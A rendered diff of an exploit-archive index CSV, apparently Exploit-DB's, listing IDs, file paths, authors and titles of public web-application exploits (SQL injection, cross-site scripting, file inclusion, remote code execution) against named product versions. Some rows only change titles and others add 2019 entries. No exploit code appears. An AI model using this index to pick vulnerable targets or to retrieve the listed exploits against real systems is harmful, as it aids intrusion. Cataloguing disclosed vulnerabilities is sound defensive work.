22298,exploits/php/webapps/22298.txt,"Typo3 3.5 b5 - 'Translations.php' Remote File Inclusion",2003-02-28,"Martin Eiszner",webapps,php, 22298,exploits/php/webapps/22298.txt,"Typo3 3.5 b5 - 'Translations.php' Remote File Inclusion",2003-02-28,"Martin Eiszner",webapps,php,
22300,exploits/php/webapps/22300.txt,"WordPress Plugin Easy Webinar - Blind SQL Injection",2012-10-28,"Robert Cooper",webapps,php, 22300,exploits/php/webapps/22300.txt,"WordPress Plugin Easy Webinar - Blind SQL Injection",2012-10-28,"Robert Cooper",webapps,php,
22315,exploits/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",webapps,php, 22315,exploits/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure (1)",2003-02-28,"Martin Eiszner",webapps,php,
22316,exploits/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",webapps,php, 22316,exploits/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure (2)",2003-02-28,"Martin Eiszner",webapps,php,
22317,exploits/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,webapps,php, 22317,exploits/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,webapps,php,
40413,exploits/php/webapps/40413.txt,"Joomla! Component com_videogallerylite 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",webapps,php,80 40413,exploits/php/webapps/40413.txt,"Joomla! Component com_videogallerylite 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",webapps,php,80
22318,exploits/php/webapps/22318.txt,"Webchat 0.77 - 'Defines.php' Remote File Inclusion",2003-03-03,frog,webapps,php, 22318,exploits/php/webapps/22318.txt,"Webchat 0.77 - 'Defines.php' Remote File Inclusion",2003-03-03,frog,webapps,php,
@ -34042,7 +34047,7 @@ id,file,description,date,author,type,platform,port
32731,exploits/asp/webapps/32731.txt,"Active Bids - 'search' SQL Injection",2009-01-15,Pouya_Server,webapps,asp, 32731,exploits/asp/webapps/32731.txt,"Active Bids - 'search' SQL Injection",2009-01-15,Pouya_Server,webapps,asp,
32732,exploits/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' SQL Injection",2009-01-15,Pouya_Server,webapps,php, 32732,exploits/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' SQL Injection",2009-01-15,Pouya_Server,webapps,php,
32733,exploits/php/webapps/32733.txt,"w3bcms - '/admin/index.php' SQL Injection",2009-01-15,Pouya_Server,webapps,php, 32733,exploits/php/webapps/32733.txt,"w3bcms - '/admin/index.php' SQL Injection",2009-01-15,Pouya_Server,webapps,php,
32734,exploits/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting",2009-01-16,"clément Oudot",webapps,cgi, 32734,exploits/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration / Cross-Site Scripting",2009-01-16,"clément Oudot",webapps,cgi,
32735,exploits/asp/webapps/32735.txt,"Blog Manager - 'ItemID' SQL Injection",2009-01-16,Pouya_Server,webapps,asp, 32735,exploits/asp/webapps/32735.txt,"Blog Manager - 'ItemID' SQL Injection",2009-01-16,Pouya_Server,webapps,asp,
32736,exploits/asp/webapps/32736.txt,"Blog Manager - 'categoryId' Cross-Site Scripting",2009-01-16,Pouya_Server,webapps,asp, 32736,exploits/asp/webapps/32736.txt,"Blog Manager - 'categoryId' Cross-Site Scripting",2009-01-16,Pouya_Server,webapps,asp,
32741,exploits/jsp/webapps/32741.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'search.jsp?q' Cross-Site Scripting",2009-01-20,"Red Hat",webapps,jsp, 32741,exploits/jsp/webapps/32741.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'search.jsp?q' Cross-Site Scripting",2009-01-20,"Red Hat",webapps,jsp,
@ -34133,7 +34138,7 @@ id,file,description,date,author,type,platform,port
32903,exploits/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,webapps,asp, 32903,exploits/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,webapps,asp,
32907,exploits/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - '/apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",webapps,cgi, 32907,exploits/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - '/apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",webapps,cgi,
32908,exploits/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",webapps,multiple, 32908,exploits/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",webapps,multiple,
32909,exploits/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",webapps,java, 32909,exploits/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",webapps,java,
32910,exploits/php/webapps/32910.txt,"Phorum 5.2 - '/admin/badwords.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,webapps,php, 32910,exploits/php/webapps/32910.txt,"Phorum 5.2 - '/admin/badwords.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,webapps,php,
32911,exploits/php/webapps/32911.txt,"Phorum 5.2 - '/admin/banlist.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,webapps,php, 32911,exploits/php/webapps/32911.txt,"Phorum 5.2 - '/admin/banlist.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,webapps,php,
32912,exploits/php/webapps/32912.txt,"Phorum 5.2 - '/admin/users.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,voodoo-labs,webapps,php, 32912,exploits/php/webapps/32912.txt,"Phorum 5.2 - '/admin/users.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,voodoo-labs,webapps,php,
@ -37279,7 +37284,7 @@ id,file,description,date,author,type,platform,port
38144,exploits/php/webapps/38144.txt,"City Reviewer - 'search.php' Script SQL Injection",2012-12-22,3spi0n,webapps,php, 38144,exploits/php/webapps/38144.txt,"City Reviewer - 'search.php' Script SQL Injection",2012-12-22,3spi0n,webapps,php,
38148,exploits/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,webapps,php,80 38148,exploits/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,webapps,php,80
38204,exploits/php/webapps/38204.txt,"Prizm Content Connect - Arbitrary File Upload",2013-01-09,"Include Security Research",webapps,php, 38204,exploits/php/webapps/38204.txt,"Prizm Content Connect - Arbitrary File Upload",2013-01-09,"Include Security Research",webapps,php,
38152,exploits/php/webapps/38152.txt,"MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,webapps,php, 38152,exploits/php/webapps/38152.txt,"MotoCMS - 'admin/data/users.xml' Access Restriction / Information Disclosure",2013-01-08,AkaStep,webapps,php,
38153,exploits/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html?acct' Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",webapps,php, 38153,exploits/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html?acct' Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",webapps,php,
38154,exploits/php/webapps/38154.txt,"cPanel - 'detailbw.html' Multiple Cross-Site Scripting Vulnerabilities",2012-12-27,"Christy Philip Mathew",webapps,php, 38154,exploits/php/webapps/38154.txt,"cPanel - 'detailbw.html' Multiple Cross-Site Scripting Vulnerabilities",2012-12-27,"Christy Philip Mathew",webapps,php,
38155,exploits/php/webapps/38155.txt,"WHM - 'filtername' Cross-Site Scripting",2012-12-27,"Rafay Baloch",webapps,php, 38155,exploits/php/webapps/38155.txt,"WHM - 'filtername' Cross-Site Scripting",2012-12-27,"Rafay Baloch",webapps,php,
@ -39265,7 +39270,7 @@ id,file,description,date,author,type,platform,port
41864,exploits/php/webapps/41864.txt,"Horde Groupware Webmail 3/4/5 - Multiple Remote Code Executions",2017-04-11,SecuriTeam,webapps,php, 41864,exploits/php/webapps/41864.txt,"Horde Groupware Webmail 3/4/5 - Multiple Remote Code Executions",2017-04-11,SecuriTeam,webapps,php,
41865,exploits/multiple/webapps/41865.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting",2017-04-11,"Google Security Research",webapps,multiple, 41865,exploits/multiple/webapps/41865.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting",2017-04-11,"Google Security Research",webapps,multiple,
41866,exploits/multiple/webapps/41866.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element",2017-04-11,"Google Security Research",webapps,multiple, 41866,exploits/multiple/webapps/41866.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element",2017-04-11,"Google Security Research",webapps,multiple,
41876,exploits/php/webapps/41876.txt,"Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses",2017-02-15,"Hacker Fantastic",webapps,php, 41876,exploits/php/webapps/41876.txt,"Coppermine Gallery < 1.5.44 - Directory Traversal",2017-02-15,"Hacker Fantastic",webapps,php,
41877,exploits/multiple/webapps/41877.txt,"SedSystems D3 Decimator - Multiple Vulnerabilities",2016-01-11,prdelka,webapps,multiple,9784 41877,exploits/multiple/webapps/41877.txt,"SedSystems D3 Decimator - Multiple Vulnerabilities",2016-01-11,prdelka,webapps,multiple,9784
41881,exploits/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",webapps,multiple, 41881,exploits/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",webapps,multiple,
41882,exploits/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",webapps,multiple, 41882,exploits/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",webapps,multiple,
@ -39975,7 +39980,7 @@ id,file,description,date,author,type,platform,port
44369,exploits/php/webapps/44369.txt,"Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection",2018-03-30,"Sureshbabu Narvaneni",webapps,php,80 44369,exploits/php/webapps/44369.txt,"Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection",2018-03-30,"Sureshbabu Narvaneni",webapps,php,80
44370,exploits/php/webapps/44370.txt,"Joomla! Component AcySMS 3.5.0 - CSV Macro Injection",2018-03-30,"Sureshbabu Narvaneni",webapps,php,80 44370,exploits/php/webapps/44370.txt,"Joomla! Component AcySMS 3.5.0 - CSV Macro Injection",2018-03-30,"Sureshbabu Narvaneni",webapps,php,80
44371,exploits/php/webapps/44371.txt,"WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure",2018-03-30,"Colette Chamberland",webapps,php,80 44371,exploits/php/webapps/44371.txt,"WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure",2018-03-30,"Colette Chamberland",webapps,php,80
44373,exploits/asp/webapps/44373.txt,"Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp, 44373,exploits/asp/webapps/44373.txt,"Tenda W308R v2 Wireless Router 5.07.48 - (Cookie Session) Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
44374,exploits/php/webapps/44374.py,"osCommerce 2.3.4.1 - Remote Code Execution",2018-03-30,"Simon Scannell",webapps,php, 44374,exploits/php/webapps/44374.py,"osCommerce 2.3.4.1 - Remote Code Execution",2018-03-30,"Simon Scannell",webapps,php,
44377,exploits/asp/webapps/44377.txt,"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp, 44377,exploits/asp/webapps/44377.txt,"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
44378,exploits/php/webapps/44378.txt,"D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass",2018-03-30,"Gem George",webapps,php, 44378,exploits/php/webapps/44378.txt,"D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass",2018-03-30,"Gem George",webapps,php,
@ -40042,7 +40047,7 @@ id,file,description,date,author,type,platform,port
44489,exploits/php/webapps/44489.txt,"WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting",2018-04-18,"Federico Scalco",webapps,php,80 44489,exploits/php/webapps/44489.txt,"WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting",2018-04-18,"Federico Scalco",webapps,php,80
44492,exploits/php/webapps/44492.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery",2018-04-18,"Sureshbabu Narvaneni",webapps,php,80 44492,exploits/php/webapps/44492.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery",2018-04-18,"Sureshbabu Narvaneni",webapps,php,80
44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml, 44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml,
44495,exploits/php/webapps/44495.txt,"Cobub Razor 0.8.0 - Physical path Leakage",2018-04-20,Kyhvedn,webapps,php, 44495,exploits/php/webapps/44495.txt,"Cobub Razor 0.8.0 - Physical Path Leakage",2018-04-20,Kyhvedn,webapps,php,
44496,exploits/php/webapps/44496.html,"phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery",2018-04-23,revengsh,webapps,php, 44496,exploits/php/webapps/44496.html,"phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery",2018-04-23,revengsh,webapps,php,
44497,exploits/windows/webapps/44497.txt,"Ncomputing vSpace Pro 10/11 - Directory Traversal",2018-04-23,"Javier Bernardo",webapps,windows, 44497,exploits/windows/webapps/44497.txt,"Ncomputing vSpace Pro 10/11 - Directory Traversal",2018-04-23,"Javier Bernardo",webapps,windows,
44498,exploits/linux/webapps/44498.py,"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation",2018-04-23,r4wd3r,webapps,linux, 44498,exploits/linux/webapps/44498.py,"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation",2018-04-23,r4wd3r,webapps,linux,
@ -41056,3 +41061,12 @@ id,file,description,date,author,type,platform,port
46611,exploits/windows/webapps/46611.txt,"Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion",2019-03-26,"Kevin Randall",webapps,windows, 46611,exploits/windows/webapps/46611.txt,"Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion",2019-03-26,"Kevin Randall",webapps,windows,
46612,exploits/php/webapps/46612.txt,"SJS Simple Job Script - SQL Injection / Cross-Site Scripting",2019-03-26,"Ahmet Ümit BAYRAM",webapps,php,80 46612,exploits/php/webapps/46612.txt,"SJS Simple Job Script - SQL Injection / Cross-Site Scripting",2019-03-26,"Ahmet Ümit BAYRAM",webapps,php,80
46614,exploits/php/webapps/46614.txt,"Jettweb Hazır Rent A Car Scripti V4 - SQL Injection",2019-03-27,"Ahmet Ümit BAYRAM",webapps,php,80 46614,exploits/php/webapps/46614.txt,"Jettweb Hazır Rent A Car Scripti V4 - SQL Injection",2019-03-27,"Ahmet Ümit BAYRAM",webapps,php,80
46615,exploits/windows/webapps/46615.py,"Thomson Reuters Concourse & Firm Central < 2.13.0097 - Directory Traversal / Local File Inclusion",2019-03-28,0v3rride,webapps,windows,
46616,exploits/php/webapps/46616.txt,"Airbnb Clone Script - Multiple SQL Injection",2019-03-28,"Ahmet Ümit BAYRAM",webapps,php,80
46617,exploits/php/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,php,80
46618,exploits/php/webapps/46618.txt,"WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion",2019-03-28,"Ali S. Ahmad",webapps,php,80
46619,exploits/php/webapps/46619.txt,"WordPress Plugin Loco Translate 2.2.1 - Local File Inclusion",2019-03-28,"Ali S. Ahmad",webapps,php,80
46620,exploits/php/webapps/46620.txt,"i-doit 1.12 - 'qr.php' Cross-Site Scripting",2019-03-28,"BlackFog Team",webapps,php,80
46622,exploits/php/webapps/46622.txt,"Job Portal 3.1 - 'job_submit' SQL Injection",2019-03-28,"Mehmet EMIROGLU",webapps,php,80
46623,exploits/php/webapps/46623.txt,"BigTree 4.3.4 CMS - Multiple SQL Injection",2019-03-28,"Mehmet EMIROGLU",webapps,php,80
46624,exploits/php/webapps/46624.txt,"Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection",2019-03-28,"Ahmet Ümit BAYRAM",webapps,php,80

Can't render this file because it is too large.